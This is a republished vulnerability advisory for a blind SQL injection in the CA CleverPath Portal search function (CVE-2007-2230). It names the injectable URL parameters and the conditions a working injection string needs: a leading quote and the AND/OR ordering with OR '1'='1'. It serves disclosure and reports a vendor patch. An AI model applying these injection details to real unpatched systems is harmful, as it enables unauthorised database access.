Application Security Resources

Sub Text of Application Security Resources

CA CleverPath SQL Injection

January 8, 2007

Tiny Url for this post: http://tinyurl.com/pdj95wq

Hacktics Research By Irene Abezgauz – January 18th, 2007 CVE: CVE-2007-2230 / BID: 23671

Background

The CA Clever Path Portal is a customizable portal for aggregation and integration of data and applications. It is integrated into multiple CA products including various Unicenter components. The CA CleverPath utilizes a back end Database for storing data and allows usage of either built in or external Database.

Scope

After identifying in CleverPath an irregular behavior when modifying query parameters in the search mechanism, Hacktics conducted research to identify an SQL Injection vulnerability in the implementation of the search query construction.

The Finding

After identifying in CleverPath an irregular behavior when modifying query parameters in the search mechanism, Hacktics conducted research to identify an SQL Injection vulnerability in the implementation of the search query construction.

Details

The light search URL is:
https://foo.bar:fooport/servlet/portal/search/execute?CHARSET=UTF-8
&showtemplate=false& OFINTEREST=PARAM&showtemplate=false
The advanced search URL is:
https://foo.bar:fooport/servlet/portal/search/execute?CHARSET=UTF-8&showtemplate=false&Search=Search&TITLE= &DESCRIPTION=PARAM&FILENAME=&OWNERNAME=&GROUPNAME=&DATES=NONE&ResultCount=20&CREATE_OPT=0&MODIFIED_OPT=0 &MODIFIED_BAFT=&MODIFIED_BAFT_YEAR=&MODIFIED_BAFT_MONTH=&MODIFIED_BAFT_DAY=&MODIFIED_TO_YEAR= &MODIFIED_TO_MONTH=&MODIFIED_TO_DAY=&MODIFIED_FROM_YEAR=&MODIFIED_FROM_MONTH=&MODIFIED_FROM_DAY=

By replacing some of the search parameters, i.e. ofinterest in the light search, or description in the advanced search, it is possible to inject SQL syntax and modify the query sent to the database, thus modifying the query results. It is important to note that it is not possible to utilize conventional injection techniques such as union select, and the injection is only exploitable via the binary search attack vector as described by Sverre H. Huseby in his posting Using Binary Search with SQL Injection.

Note: The injection only occurs if the first character of the input is the ” ‘ ” (single quote character). It is also important that the AND operand appears before the OR operand in the injection string, and also that the OR ‘1’=’1 operand appears in the query. Otherwise no results are returned even if the condition of the AND clause is true.

Affected Systems

Multiple CA products and 3rd party products utilizing the CleverPath Portal

Solution

CA has been notified of this vulnerability on January 18th, and has released a patch correcting the problem.

Copyright Hacktics 2009 All right reserved

This post is also available in: Anglais

Learn more about Seeker

More Avis de sécurité